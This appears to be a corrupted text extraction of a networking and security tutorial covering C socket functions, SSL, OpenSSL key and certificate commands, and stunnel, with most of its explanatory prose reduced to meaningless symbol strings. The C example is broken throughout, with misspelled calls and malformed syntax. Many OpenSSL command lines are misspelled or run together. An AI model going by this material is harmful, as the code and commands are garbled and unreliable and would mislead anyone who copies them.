Socket() +
-, @
`
2
3 '
Sockdf \ "
0, < 'G C
8PH
0,< ,6 3 2 G ,L
/
?
),
#B,
- 5 <2
%L
,
? !
h @%
5<
5
S /
I
),
0,
?
O*
5<
-, 6 U )
/
(8! %
`
a Serv_addr …
0
2< IP h @
-" , : Addrlen …
B
P
H `
H sizeof(struct sockaddr)
-, 6 U )
4 h @ ? 56
a SOCKDF …
7 4 h @ ) ,L
'G
0
% !
L*
3 7 4 h @ 5<
5<
,
42
H
# 2
' L 7 4 - 5<
H)
v 4
,
8
C
R4
X
3
9
5
2 -, 6 U )
), <
-
O*
% !
,6 3
M 9
&
3 7 4 h @ $^ P -,
\) <
^P ,
,< d *
)
[,
C
G:H -, 6 U )
7 4
0, 5 \) <
, 6 3 …w + 2
TCP ^ P
,
0,<
H
-
:3 - 5< errno
Ÿ
UDP A)
a(
,
,
(E (
T /0
\
A R4 )
) UDP A)
\
' (,! 7
'
u )
'
'
)T
)T
$T
+
?
7
0
-, 6 U )
socket () +
4
3 '
2 0,
E (
5
…
\ "
_=1
0 < ( E SOCK_DGAM
_ bind() +
'
-
]0, 6,
GH
h @] š
,P
P
]0,
? I
6-
7 4 h @ -,< E
'
I ,
'X
h @ ,< A"
4) '
-
0
,6 3
R4 ?# T
0 < ( E sendto()) recvfrom()+
B
_O
ˆ 6?), _z
H) _,6 5
(
GT
) -,< d * _7 4 )IP
\
'
0, , P
)T
-,< E
C
_
5
4 ) socket
4) socket() +
] 0,
E (
…
\ "
_=1
_ SOCK_ DGRAM]
0, 5 T
-, 6 U )
, 6, 5
)T
5
G 6-
0, 5 T
? 6'
-
$, <
#
<,
N ,
'X
1
ˆ6?), ,< "
-, 6 U )
"
0, , P
"7
(
5
P-
5<
"
'
-,< E
T
6_O
# H)
-, < 3 < -, 6 U )
0, 6, ( E
a
-
+
_z
B( '
Int send to (int sockfd, connect void* msg, int len, unsigled int flags,
const struct_to, int tolen);
0
z *
F socket() +
-, @
E@ "
1
6-
(
2
0
-, 6 U )
Y
d*
3
7
?@
H UDP
) '
0
0, N I
H %. h @ a Msg …
I'/ ( 4 2 '
0 <T
S /
?@ C
8G'$;.
?)
4 - 5 < 2 `56) , L
a Flags …
, ` 4 " &6 4
2<
a TO …
`
IP h @ ,
^
) -,<
( 4 T 9 a Len …
1
Sockaddr \ "
8PH
C
a sockfd …
L*
`
0 < I
size
,
sockaddr `
?@ ,
I of (struct sockaddr)
0
T
,G send() + , 56+ 2
n' % !
,
,
2
:3 , < _…w]
# -,< T
6
T
,
,G , 6X
,
errno
# 6" 0, 5
0,<
B
/
")
B1
T 9 a Tolen …
H 0
u
@T
2 `56) -
"7
-,< ?@
:3 - 5<
X
,G
3
2 C
5/
0, N I
a
,
(
P-
B
'
+
&
B( '
Int recv from (int sockfd, void buf, int len, unsigned int flags, struct
sockaddr_ from, int_ from len );
0
,6 3
-, @
H %. ?@
F socket () +
'
6-
(
% !
L*
I'/ "
a Sockfd …
B
. h @ a Buf …
0
_
S / ]
< '
,
4 T 9 a Len …
) ,<
?@
3
5<
) I ,P
socaddr \ "
`
a From …
7 4 h @ ) IP h @ 7 L*
?@ % !
8PH
C
0,
0,
0
A"
4
-,
I
?@ % !
42 0
-,< '
Y
?@ a Flag …
`
T 9 a Len …
,G & + 2
0
/
56
,
'
a #P
<
#P<
,
0
63i
6 6
N +
@2 5
"
, Y+
-,< 'G 5
3
6-
0,
+
6, @
"
g
),Y
a getpeename() +
include<sys/socket.h>
int getpeername(int sockfd, struct sockaddr_addr, int_addrlen);
) 47
4 h @ ) IP h @ % < $%
-, < = G % •7
+ 2
M 9
6
6,
+ 2 " - Y
4 0, 5 z *
^P %
M 9
a
I
2 0
-,< = G ?@
0,< ,6 3 4 %
3
8P
C
H
sockdaddr \ "
M 9 7 4 h @ ) IP h @
% !
.sockaddr
u
)
, 6 3 _…w]
,
`
l '+
n 9"
@ C5 / ,
?@ ,
A
'U
LE \ " 5 < 2 <
0,
: Sockdf …
`
a Addr …
b
`
T 9 a Addrlen …
' (, ! 7
:3 - 5< errno
0,< ,6 3 I :3 \
h @ ) IP h @ S
L*
2#5
)
% ,P ,< - < ?@
#
BE 7
7 4
Š j*
G
gethostname () +
( 2 $,
,6 3
$ <
F ?@ )
_ www.ibm.com C
8Q) ?@ IP h @
5<
< ( + 2
2< 2 5 (
a
TG
<
"7
+
B( '
#include <unistd.h>
int gethostname(char *hostname, size_ );
U4
_
<
7 P
!
] 6
"
0,< ,6 3 - 3• E @
0
:3 - 5 < % P
H , 56errno
0
2
, )-
")
,6 3 Y
-, 6 U )
-" / (
,
G 0, 5
) ,L
a
b.
3
E
< E
,
)#
K
1Q
- Y ?@ IP h @ " C
5
e '2# 1) ,
h @? !
N
8P
C
H
X
N56
,
1
)
#B
5! " 9 ) DNS
5F
H
5<
,
DNS
@ 5F
0,< ;. ?@
^P
< T 9 a Size …
, , %5! l '+
'?@ H) E
" "
:3 ,< _…w]
0, 5 - Y
W 3 2<
2< ( +
S /
a -" /
-,
a Hostname …
@
-, 6 U )
" B( '
-" / ( h @ ,
,@
2
#include <netdb.h>
struct hosten * gethostbyname(const char * name);
0-, 6 U )
7
?@
3
hostent \ "
< a Name …
-" / (
`
h @ $+
a
,
-,< = G "
Struct hostent
Char *h_name
Char *_name
Char **h_aliases
Length ; ¡Int h
Char
**h_addr_list;
};
8Q
C
, 6 3 -" / (
< 2
#P<
] 2<
( a Hname …
5
_www.ibm.com
_ <
,
, B'2
#P<
3 wq
< 2 ] 2<
, <- <
( a H_aliases …
G
3 a H_addrtype …
N 56] h @ -
_0 < ,6 3 AF_INTEL
S / h @ T 9 a H_Length …
-, 6 U )
2<
^
IP h @ ?@
0 <
,
`
),
`
I errno
<
0,
- <
u
$?
&@
- <
B
PH +
M83
)
$?
u
0 <
'
:3 \ =
‰9
< 2 0
c +
&@
' 7
2
NULL , 7
herror
5
) X TQ
3 |q
' 7
,6 3
I
I
H _ addr_list…
<
u ?@
H
g
)
2
g
+ 25X
F) + 2
H
,
F ) ,< ,6 *
herror() 5
a,
H
)
+'
"
F)
#include <stdio.h>
#include <stdio.h>
#includer < errno.h>
#hnclude <netdb.h>
#include <sys/types.h>
#int main (int argc, char * argv[])
{
struct hosten * h;
if(argc!=2){/*error check the command line*/
fprintf (stderr,” usage: getip address\n” );
exit(1);
}
if(h=gethostbyname(argv[]))==NULL){/*get the host info*/
herro(“ gethostbyname****_;
exite(1);
}
printf(**** host name :%s\n” ,h-h_name);
printf(“ IP Address :%n” , inet_ntoa(*((struct in _ addr * )h-h addr)));
return.;
}
E )-
'
) )? !
0,
k
F) 3 )
'b3 )
(
' Enter , B) <
) IP h @
7 L*
a
?
getip
-" / ( h @
7
2 (
?@ 5F
" A" c
" 7#
2, l '
9_=1
13 B '
-" / (
B
F
U
)-
Œ
aTQ 0, 6
$getip www. Ibm . com
,
IP
+H ) h-addr-list u
6)
@
#P<
, -, < - 3•BE 7
( Y
:
' -
<
L
1
)
<
?@ T)
1/
F) 3 ) k
T G IPh @_O
-" / ( h @
3 |q ,
<
b '5 < ,
h @ % ,P
7
6
l'
8G'
C
0, , "
inet_ntoa() + " _pws 0w{q 0w†}žw‹q C
8Q]
0
in_ \ " `
P
E 2
?@
0
) )?
@ inet_ntoa() +
) ,< = G ?@
3
-,<
•\ nP
: • %5!_z
%L' ,
addr
5
3 lY %5!
1
)
2 5>
) )
4
"
•\ nP: • %5!
0, '
Q $X
SSL g(
[Secure Socket LayerZ
a – N&
5
3 6
T
F 2 7 !89 T P
'9
6,
) 6-
0, , < / 9 78#
2
"
-,5! %#
5 $ 6-
N
?,< nK'
"
. " ,
N&
P
! 78#
2 0,
'
P
! -,5!
N& …
?
6? # )
" ,
6
& , B)
,B
,
F )
, ,F
0
6
6
( ?
21
) 0,
) )
?@ c
!
0
* & (
) "
N & A) )
6 P. % H 6 ) "
?@ () %#
F
N& …
N & , B?
, B T P A) 2 %#
7
2 T
%#
0, <
- 4 1
g CP
6(
6
P . m.1
&
3 b' ,
F ?@
-
0,
F
A) 2
F
j
& " 0,<
&
A
L3 , B
) M 9 " ( u4
,
Gœ
L3 , B)
#
& ) -,< B
),
, < 2t5:
F
N& … %#<
N& A)
6-
.
!89 , 6 * ? N
'
n 9
@ ? )@
5! , B " ? N ) , & A
? 59 ?
6?
<& , B ) 2 "
,
T
3
, B)
N,56 ) "
N ,B ,B
5! , B
)
bP
1
< 6 V
?
5! , B
) -,
N & A) )
?
,
,
6 #P
<
<) 0-,
a" ,
–
0
2#5
L3 , B 0 <
2
5! , B
?@ , Z>
- Y ( u4 ? "
5! , B n P
: A) 2
0 <
?@ , * ,
u4 ,6 *
?@ D
B %#
A
0
,B 3
" %#
2 %/
x
0
5! , B k
F
%
/
0,< \,
?
5!
N& …p %#<
N
% H"E g
6
'L ?
E/ ?
F b
,B
&
5! , B
-,< T, )
1
, B" - Y
!
'L ?
,
-,
m .1 ?
, B 0,
0 <
-
U
),
7 !89 % ?@ " - Y
?@ N
7 !89 ? & n 9 "
,
&
7 !89
N
6
H- Y
. …
. "
I
. 0,<P '
N1, @
7 !89 • &
'7 !89 - 56)
'L ?
<
&
-,
, B 0A
L3
0,
&
6-
5 0
%
/ -,
-, < T
'
$7) Y
7
L3 , B %
? "@
-,
Hash
5
6-
,
,
'
&
0 <
-
1E
,4),
> 0
' B ( u4 - 56
5 …
5 "
L3 _ 1 E
( u4 ) ?
?
6( u4 Hash
/? & ) 1
?@ Hash +
6 u4
m .1 , < ? # Hash
L3 , B
? 56
6
2#5
I
,
P.
> ]
<
7) Y Hash
g
P .
-,
'
> U
7
),
O /
$,
6
( u4 Hash
'
) 2 ),
,
'
" -,
'
0 <
6-
5
5!, B
1E
" / 6-
5
)
F ) ( 4 n,L …
?@ b
6
L3 , B
L.
P! ?& )
<
, h
F n,L
F n, L
0
@
F
? "@" - Y
,
,
1E
6
b
F 6
Q
1/
<
$ <
( E
P! 5B )
6
5! , B
bP
( u4 n, L 0
6
- Y -, <
(E 9
,#
c 5G %5!
C
0
6-
<
( E
6-
™Y/ 6-
4
•A) ) S
n, L ( u4 , P
0
F
L3 , B 2< ?@ h
5 ) ( u4 n, L +H )
A"
F n,L
d*
, ,F -
()&B) ("c 6)
#1 " ? 59 ?& h
5
5
5 0, N,#
, A" ( u4 ,P n,L
6
0
-, !
6
5! , B] ,
6
T.
6
?
v ')
3
U)
?
2 4 i:
N
1P 0, <
60,
b
0
2
6
3 = D) ,
6
2 " M, 6, 6 % #
S
, $?
@
6
- E"
U)
6
?@
U)
) _= B*
6
U)
0,<
5 ™Y/ 2 X
YD)
6
%3
6
U)
F
6
,
?@ -,
6
U)
6
S
BB S
"
U)
F
2 0_, ,
6
U)
- 4]
…
A
W L*
2
),
-
,
P
G< 2 3@ " 6
6
> )( % <
6
> 0 <
Z> A 3
a SSL %•) 4
H- Y
#P< )
TCP/IP % # ) 4
c
c
6-
TCP/IP %# ) 4
)T
HTTP) LDAP) IMAP ,
6% # ) 4 )
0, <
F
SSL %# ) 4 …‹ %#<
c" c )
3
6
c"
,6
-" F SSL
BH
<
-,6
l '%#<
!89 ) , 5
E
,
)
F
N& 2 T L
SSL
U)
U)
M 9)
5! , B ) 6
%
BH 2 a SSL -, 6 U )
&'(
P! "
0, 5 %
5! , B
,6
-" F
-,<, 7
67 P
[ …
/ ? 59 )
N&
T
U)
a,
?# 2
9 ?56
SSL 0, @
)
R 4 ? # & % 5! 2 U #!] , 5 7 P
[ SSL
2 `56œ_
?
2 4 SSL
,
6"
,6
# " - Y
$ )
6
),
&
,
,
0
U)
6
,6
H
2 `560, 5 %
3 5! % H 6
),
BH 2 a SSL
-" F )
/ ? 59
&
1
U)
67 P[
0, 5 ,
,6
-" F
U)
) )
&'(
BH 2 a SSL 2 TL
)
0, 5 1P -,< & 7
) SSL Record protocol a
= G
6-
SSL
( u4 1P
$ 6( u4 2
%# ) 4 protocol SSL Handshake
% # ) 4 " - Y - . & SSL
1P " M, 60, 5
SSL
= G
9 P %# ) 4 0,
)
)
U)
a
0
?@ M 9 )
6
9
)
!89
K
&F % # ) 4 ) " SSL % # ) 4
-, < % #
'SSL
T
?
)
U)
" M ,6
U)
b
6
)
67 P
[
N&
N1O *
0,
_
3] )
U)
<,B
5! , B
,
- Y
U)
< , B)
5! , B
N& %
" g@ SSL Handshake ( u4
5! , B " - Y
<,B 3
( u4
&
U)
SSL
-" F )
B
F
6
)
N & TL
N& "
0,<
A 3
G F " ? 59 ) 6)
5! , B
G
U)
U
& $ 6-
? )@
67 P[ % < ,
9P %# ) 4
P
SSL % # ) 4
<,B
K
,6, -" F )
E
SSL
$
0,6
67 P
[
N& " - Y
SSL -,<
0, 5
P 4
N&
2t
5:
6
%# ) 4 " '2 0
œ, 5 7 P
[
U)
&
" '2 0
, B 2 0,6
H- Y
0,<
a, -,< - )@
"
83
9
%/
2
'L
-
T
$&
"
SSL *
N1- Y
SSL ^ P
U)
- 5< )
)
U)
!89 N ) -,<, 1
0, 5
U)
3 6
U)
6
3
)
-)8!
,< Y T) B
/
,<
U)
!89 &
6,
"
0, 5
0,
)
6-, < T
N& T L
E ?#
)
,
b
T
T
&
!89 " - Y
(8!
,
U)
7P
[ )
6
0, 5
0
'
N1
( ')
F
)@
& ) -,< 1P T.
&
)
6-
5! , B
E
T
)
0, 5
,B
-)8!
0,
U)
T
6,
g
- Y
U)
)
G
œ,
,< 3 6
)
,< -
5 3 TL
1
)
,
. ,B
&
F)
U)
1
)
. ,B
?@ -,< &
67 P[
3
)
- 56 -,< Z> ( u4
U)
,
" - Y
?@ ) -
)
1
)
67 P
[
.
3
U)
6
A 3
L3 , B " )
)
0, 5
U)
7
2
0, 5
, 5
,1
1P SSL
?
?@ " - Y
? 59 T
T9
B
F, B 1
)
. , B" - Y
T9
!89 0,<
B
F
2 `56œ <
( u4
. 2'
& )
u"
U)
?
) )
)
<,B
N& , B 2 " - Y
G -,< 1P 7 !89
0
B
F, B B )
T
6( u4
,6
\89 )
9 P " '2' ? 4
-, < &
u4 B )
( u4
U
G F"
%
/
U)
œ,<, 6 3 &
0, 5
0,<
9P " '2 ' ? 4
,
'
u4
U)
& )
U)
0
SSL
-,< <R V <
G F " ? 59 )
B
F , B ) -,
& $? )@
SSL
(5
&
B
F, B 2 " )
0, 5
6,
2
G
g
)
$,
- Y
,< -
U)
5 3 TL
,
. ,B
&
1
)
9P " '
- Y
67 P[
U)
6
A 3
)
3
6-
)
0, 5
U)
L3 , B " )
7
0, 5
, 5
,1
B
F, B 1
)
1P SSL
" ?
B
F
?@ " - Y
? 59 T
T9
. , B" - Y
T9
!89 0,<
2 `56a <
( u4
U)
?
N& )
. 2'
u"
) )
)
<,B
N& , B 2 " - Y
G -, < 1P 7 !89
GF
0
B
F, B B
0, 5
T
0,<
U)
6( u4
,6
\89 )
9P " '2' ? 4
0
,
SSL
-, < <R V <
G F " ? 59 )
&
u4 B )
-,< & ( u4
9P " '2' ? 4
$? )@
'
U
u4
B
F , B ) -,
U)
U)
&
B
F, B 2 " )
- Y
a )
9 ?560
6 ,
)
T
T
6 )
" ,
6
"
)
U)
3 6
" - Y
U)
)
SSL
6,
SSL
6,
P! ? "
0
Fv
s B
/
+:H
6,
667 P
[
U)
&'(
0, 5 7 P
[
U)
U)
)
,< Y SSL 9P " '
)
&'(
a,
6
)
SSL 9P " '
(5
&
/
a,< , 6 3 &
0, 5
" p B
/
%
€
0, 5
'
P
Qv 4
"
6
@
PG )
, @ ',< -,< —>
A 3
6
0,
6€,<
U)
2G
5! % H 6
12 0
6
3 5! % H 6
-,
( 2
0
3
1
&
6
U)
)
,
- )@
-,
6,<P
6
" ,G )
),
6
&
6, #
)
# ) #1 >
"
6
7 !89
) ,< -
: -, < - Y
)
,
u 6
6
)
1
5! , B @
: )
# ) #1 >
),
(
&
b
?@
>
L3 , B
6
0,< ,6 * ,
)
)
6
-,< +H )
)
U)
(
#P
< ?56
P
Q l '7c
(5
a
(E
*
+
"
6
2 " - Y
6, B E …
CRL ) CSR $ 6
,
( u4 -, #
&
E SSL
Shell n 9 "
0,<
DSA ) DH $ RSA
x.509
C
GH )
openssl
7 # " - Y
?
@
v 4
0,< ,6 *
OpenSSL
0,
?@ ,6 *
&
>
,
,
5! , B " - Y
-,< • 6
g
3
6
B
/ 2 €
0
2
&
U)
1 ( 2
),
0, 5
5! , B
,
TL 7
),
6
@
" DN ,B'
1 -, @ 6
< 5 ,
-,
1SSL
0, 5 'X
€,
6
"
&
6)
),
?@ N
&
),
R4
3 5! % H 6
U)
),
6
N1 B )
TLS ) SSL
E …
P. …
& )?
U)
?
…
S/MIME -,< &
6( u4
, …
a
openssl
"
) )
& …
'
Openssl command [ command_opts ][ command_args ]
2G
-
#B
5! \
,<
Y?
" –
0,
- 56
N -
7
6
@"
" - Y
&
1/ 6
,
)
;!
2 0 <
&
U)
?
passphrase
2 ?
)
)
S F ( 5 ?, E
,
) )
?, <
?
- Y
7
passout
" (,
"
6S
6
"
passin
R 10, <
0
<
6
, B2
<
"
passphrase
^
<
F?
5
# &' >/ passphrase
5L ?# 2 " - Y
6
& "
'
& b
passphrase 5B
0
d*
,
<
?
)
_ F) 3
passphrase
) )" ^
a
"
& ) 2
openssl
4? !
- Y passphrase 7 P! " …pass : passphrase
0 <
0 <
- Y passphrase ?, 3
" 0 < - Y ? &56 9
( 5 % < T)
L3 , B
6)
<
,< passphrase
# ?
1/ 2
6 6
)
F ( N6
] passout- passin
S
L3 , B
-" , -
0,
)
# " %P
H
6
G ?, 2 0
Y
2
" ?
L3 , B 2 " -,< , 1
2
,
3
%
L3 , B 2 " - Y
F ( N6 < - Y U )
9
6
2
N M 9 " 0,<P - Y % H ?,< -, " 7
,
M 9"
7
passphrase ,
^
&
",
2 ( 5 x509 ) genrsa req , rsa
"
H
P
10,
$, , 1 CSR
2 U
3b
6
#
0 5 - Y
),
0 < >
(E ?
, 1 ( N60 < - <
2 0
6
4
PU )
3
' )
0
),G -,!" - Y
("c SSL
),
0 <-
command
,G
L3 , B
, 5 T
2
< ,
- Y var :.
u
, " - env : var
pathname % 'T) : " -file : pathname
…passout ) …Passin & )
% ' "
0 <
passphrase ?,
3
()
) ) passphrase ?,
: " )
3
T) :
0 <
- Y passphrase ?,
3 , < number ?@ M G - 5<
- Y
F) 3
B'" -fd : number
0 <
e 'j 4
& "
#B
5! 2
<
>G - 56
manual 7 .Y
-, 3
,
) )" 9
0,<
5 stdin " - Y
Passphrase - stdin
"
x509 ) rep , rsa , genrsa 7
7
2
0 <
U4
,G
-
6 5 H
iX
@ T) ,
0
6
F)
@
a genres
%# <
2
RSA
B ( '0 )
L3 , B , 1
2
0,<
"
Openssl genrsa [-out filename] [-passout arg] [-des] [-des3] [-idea] [-f4]
[-3] [-rand file (s)] [numbits]
aT) ,
-out filename
<
< ?@
F) 3
L3 , B
- Y
F) 3 % '(
& 2 "
0,
<
-idea − des3 -des
&
IDEA
DES3, DES
0,
- Y
6 &
6
d*
< stdout
N1"
# "
L3 , B ?
-passout arg
DES3, DES
?
d*
a,
0
N1"
# "
$ <- Y , B ?
0 <
numbits
6
- Y
& 2 "
Šwp ?@ e Y 4 ,
, 1 passphrase ?), )
IDEA
&
F) 3 % 'passphrase
›,
d*
wqp‹ T 9
, BT 9
L3 , B
"
openssl genrsa - out rsakey. Pem 1024
) DES3
N1 -, < &
wqp‹ T 9
L3 , B
a,
"
, 1 W 3 passphrase
openssl ganrsa - out rsakey. Pem - passout pass : enter –pass-here-des 3
1024
a rsa
?
2 " - Y
6, B' ,
0
u
a,<
0)
@
. 0
" %#<
RSA
6, B
% ,P N
'
2
,
B ( '0 5 -,6
2
' "
6, B
, B =B*
opinsslrsa[− inf orm PEM NET DER][−outformPEM NET DER][−in filename][− pa sin arg]
[−out filename][− passoutarg][−sgckey][−des][−des3][−idea][idea][−text][−noout][− modulus]
[−check][− pubin][− pubout]
aT) ,
- inform
NER, PEM ,
,
NER, PEM?
,
d*
,
2 G
L3 , B
) )"
F) 3 , B
) ), B
% <
- Y
& 2 "
?@ paaaphrase , < -, < &
&
'
) )% '
0 <
- passin arg d *
'
PEM ?@ e Y 4 , 0,< DER
0
- infilename ,
) ), B
PEM ?@ e Y 4 , 0,< DER
0
- outform
2 G
6 &
-, 3
) ),B
0 <
- out filename "
0,
d*
<
,
-,< < ?@
F) 3
L3 , B
F) 3 , B
B'
- Y
& 2
0 <
- passout arg d *
?@ passphrase , < -, < &
&
F) 3 , B
0 <
− des − des 3 − idea
?
IDEA
&
DES, DES
6
0,
- text
7
-, < ,
1/
- noout
F) 3
- Y
-)8!
0,
N1"
# "
L3 , B
L3 , B
'
F) 3
& -
L3 , B 6,B'-,< , ( ' & 2 "
Y
0, < 5
- modulus
0,
0,
V4
6D F) 3
L3 , B
6,B'
6D
, B modulus 5 H
passphrase
"
Opnssl rsa –in inkey. Pem- passin file: pass- file- out outkey. Pem
-,
3
,
) ) " passphrase] ,
&
L3 , B
"
a_ <
openssl rsa- in inkey. Pem –des3 out outkey. Pem
a,6
?
L3 , B
7
.
"
openssl rsa-in inkey. Pem – text - noout
a req
, B, 1
?@ " ?
a,<
,
60 <
" %#<
2
- Y CSR
,
B ( '0 5 - Y &
2 "
6
)
L3
opensslrep[−inf otmPEM DER][−outformPEM[−in filename][− passinarg][−out filename]
[− passoutarg][−text][−noot][−noout][−verify][− modulus][−new][−rand file(s)]
[−nwkeyrsa: bits][−newkeydsa: fise][−nodes][−key filenane][−keyfotmPEM
DER][−keyoutfilename][−[md5 sha1 md2 ]][−configfilename][−x509][−days n]
[−asn1− kludge][−newhdr][−extensionssection][−reqextssection]
aT) ,
-inform NER, PEM ,
,
0
-outform NET, ,
) ),B
F) 3 CSR
2 G
PEM ?@ e Y 4 , 0,< DER
d*
CSR
) )"
) ) CSR
,
,
% <
&
) )% '
- Y
?@ paaaphrase , < -, < &
& 2
7
-,< ,
1/
-)8!
0,
-noout
-modulus
F) 3
CSR
6 D F) 3
'
d*
CSR
6,B'
F) 3
6, B'-, < , ( ' & 2 "
CSR %3
-, 3
) ) CSR
0 <
-text -
'
PEM
0 <
-passin arg
'
PEM ?@ e Y 4 , 0,< DER
,
0
-infilename "
2G
6 &
&
Y
0, < 5
6D
5!, B modulus
5 H
0,
-new 7 !89 )
E
<
CSR
0 <
- Y -, < d *
_0 <
-newkey rsa: bits CSR
-keyout filename
E ;!
'
,
–key
& 2 " - Y
) )" & "
, B " CSR
& "
,1 ,B
,< -,
) PSA
L3 , B
0,
d*
,B 6
<
< ?@
d*
]
& 2 " - Y
,G Bits 0 <
L3 , B
B'(
,
-x509
E root 6
CSR
<
F
,1
& 2
d*
& 2 " - Y
0 <
-days n
P! ?& n ,< -,< - Y –x509
6
& "
0,
, 1 CSR
a,
L3 , B
d*
" - Y
"
openssl req - new- key key. Pem - out req. pem.
a,
, 1 ? &56 9
CSR
)
L3 , B
"
openssl req - newkey rsa : 1024 – keyout key. Pem – out req. pem.
a,
, 1 ? &56 9
root 6
)
L3 , B
"
openssl req –x509- newkey rsa: 1024 – key. Pem- out cert. Pem.
x509
B ( '0 <
- Y
6
),
&
b
6
a,<
,
2 "
" %#<
2
opensslx509[−informDERPEMNET][−outform
DERPEMNET][−keyform
DER
PEM][−CAformDERPEM][−CAkeyform
DERPEM][−infilename
][−outfilenam
e]
[−hash][−subject
][−issuer][−nameopt
][−enddate
][−purpose
]
option][−email][−startdate
[−dates][−modulus][− fingerpr
int][−alias][−noout][−trustout
][−clrtrust
][−clrreject
]
[−addtrust
arg][−addreject
arg][−daysn][−signkeyfilename
][−x509toreq][−req][−CAfilename
]
[−CAkeyfilename
][−CAcreatese
rial][−CAserialfilename
][−text][−C][−md2− md5 − shal − mdc2]
[−clrext][−extfile][−extfilefilename
][−extensions
section]
a T) ,
- inform $PEM ,
,
- outform $PEM ,
,
'
NET
F) 3 CSR
2 G
'
PEM ?@ e Y 4 , 0,< DER
0
0,
-,
) ) CSR
2 G
PEM ?@ e Y 4 , 0,< DER
0
- in filename
6 &
d*
CSR
,
) ) CSR
3
% <
NET
) )% '
- Y
& 2 "
0 <
- out filename "
0,
d*
,
CSR
-,< < ?@
) ) CSR
) )"
B'
- Y
& 2
0 <
- text
7
-, < ,
1/
0,
- nooout
CSR
F) 3
CSR
-)8!
'
-, 3
F) 3
6, B'
& -
6, B
'-,< , ( ' & 2 " - Y
0, < 5
- modulus
F) 3
6
5! , B modulus 5 H
%3
0,
- serial
- hash 0,
0,
- subject
- issuer
6D F) 3
6D F) 3
0,
0,
6D
6
6
S/
6D F) 3
6D F) 3
6
6D
T
- 5<
( hash
,
6
(
-,
S/
(
- email
6 D F) 3
6
S/
# ) #1
4h @
0,
- startdate
0,
- enddate
- dates
6D z) 3
0,
0,
6D z) 3
6D F) 3
- fingerprint
0,
- signkey filename
6
>
6D F) 3
6
<
E filename
>
v
) ),
v
1E
;!
'
v
6
6
root 6
),
>
& 2 " - Y
H
L3 , B " - Y
0 <
- keyfrom ,
,
) )
L3 , B
PEM ?@ e Y 4 , ,< DER
0
- days n
d*
P! ?& n ,< -,< - Y –x509
6
% , PCSR
- Y
d*
6
–signkey
2
PEM
& "
0,
- x509toreq , B " 0,
&
'
& 2
-,< -
L3
0 <
- req
-,
3
) )? !
-,
3
) )
6
e Y 4
CSR
1/
& 2 " - Y
0 <
0 <
- CA filename ?
>
6
0 <
- Cakey filename " ?
-
Caserial
d*
filename
4( "
&
nB
G
& 2 b
6
d*
),
& 2 b
7 P
! % '2 (
4 -)8!
,
6
E
),
<
&
6CERTICATE T
0srl ,
- CA createserial
d*
>
0 <
),
6
- Y
L3 , B
<
- Y ?@
- 5< ) / % '
e Y 4 , 0,
&
6certificate T
^
6
- 5< % '
filename
- extfile filename ,
H ?@
6extention
- Y
0,
- extentions sectio
& 2 "
W 3 extention
6
d*
? )&'
0 <
a,6
?
6
B'
7 !89
- Y
"
openssl x509 – in cert. Pom-noout-text
a,6
?
6
T
- 5< "
openssl x509 – in cert. Pom-noout-serial
a,6
?
6
S/
(
"
openssl x509 – in cert. Pem – noout-subject
a,6
?
6
1E
>
"
– fingerprint openssl x509 – in cert. Pem – noout
% ,P DER
a,
' PEM
'"
6
"
openssl x509 – in cert. Pem – inform PEM – out cert. Der-outform DER
a,
% ,P CSR
6
"
openssl x509 –x509 toreq-in cert. Pom –out req. pem – signkey key. Pem
a,
% ,Proot 6
CSR
"
openssl x509 – req-in careq.pom-signkey key. Pem-out cacert.pom
>
6
),
&
L3 , B ) 6
" - Y
CSR
"
a,
openssl x509 –req – in req. pem – CA cacert. Pem – CA key key . pemCacreateserial
F) 1/ ) SSL b
a
-,< & 7 !89 ?
)
,
#4
? !
.
?
@2
&
"
H ) ,<
" ,
T) ,
" U4 -
1/ )
a
2
U)
…
], 5 T
#
,
U)
5 -, <
- < Stunnel
) )
6
F) 3
' ),
,<
6
@
9
] ,<
-, < &
"
'
- Y SSL Wrapper
\ 2 0
E n 9 2, ?
)
I
0_ IMAP )
6 &'(
7Y
SLL
5 SSL
1/ 2
"
,
?
SSl " - Y ?#
'X ?@
) '
6 &'(
I
0 _Apache O) )
b' 1/ 2
7 !89 T
6U )
SSL 7 #
) ,<
0
&
=B*
'
a
'
)
)
L3 , B
L3 , B
,1
openssl genrsa – out key. Pim 1024
a CSR
0
L3 , B b
?@ ?
>
a
6
'
),
CSR ?
&
" - Y CSR ?
"
,1
'
>
openssl x509 – req – in csr. Pem – signkey key key. Pem – pem – out .
pem – days 365
POP3 )
- 56
Stunnel &'(
SSL " -,Y - . \ X
" POP3 )
?,<
- 56 SSL " - Y
a
2#5 n 9 )
2<)
5 H2
<
-
iX
Stunnel " 0 <
- Y
7
4
@)-
,6
A
a
'
{{Š - 5 < 7
wwq - 5 < 7 4
H
)
6script
7
4"
b
,
7 !89 Stunnel
-, < &
7 !89 2 ) ,
"
7
Y wwq - 5<
2
0, < A"
4
Stunnel-d995 –p/usr/ local/ssl/certs/stunnnel. Pem – r localhost: 110
U)
,
)"
'
7
-,< & 7 !89 Stunnel
{{Š - 5< 7 4 "
2
0,
F -, <
&
a
!89 2 A"
H
4
6Script
7
Stunnel-d995 –p /usr/local/ssl/certs/stunnel.pim-l/usr / sbin/imapd
)
L3 , B % < S
stunnel.pem c
% '
, B " , G Stunnel.pem % ' 0, <
0,<
<
_ -,
F) ,
&
)
7
13 :
6
] )
) W 3 L*< ¢
^P 2
0,
,
— )
? 59 5 <
? 3 IE
"
,
6
6
, 5 '—
"
5<
- P< ?#
!89 % < ,
: 56
6
0_ B
# %. $ P! 7, $ % 5 h @ $ ( , 56$
- 5 >
7 !89 2
L*< 1 E
hash
% H 56
? 4
)
H
,
> )
5<
'2
F T/
6
?@ S/
)h @
5! , B % < 6
I
" - Y )
6
CA 0
5! - ›,
) > )-
R ,
$O)
CA
' 7 !89
7 )&B "
5<
@
&
L3
0
@^
2 0,
—L*<
—
5<
, 5
)
R
6 6
) 1E
N
2 2 `560
0,<
$, - 5
^P
< ? 59
6 ],
7 !89 )
),
N c 5G 5<
" €,<
$, 6 ? 59 )
L3
—6
M 9 ?@ — › GH ) @ €, - ›
'2 ) -
)
6
" ,G & )
a Certificate
? I
6
5<
5! &
5
'
N 56
6
c 5G 0,<
C
2
SSL
(Certificate Autority)
6>
56
1% <
a
"7
—6
¢ 2 * A)
CA.pl −newcert
(openssl req −config /etc/openssl.cnf −new −x509 −keyout newreq.pem \
−out newreq.pem −days 365)
#
b
F
6
6
6
0
,
( 5 0,
? 59 % H
g
5 <$
1E
u) j
-,< >
3 6
0,
?@
66 6
>
"
)% HC
8
-, < >
$,
T
6
6
) > A 3
\ 2 " 6CA
6
a
6
6
2 "
#
"
5
Certificate:
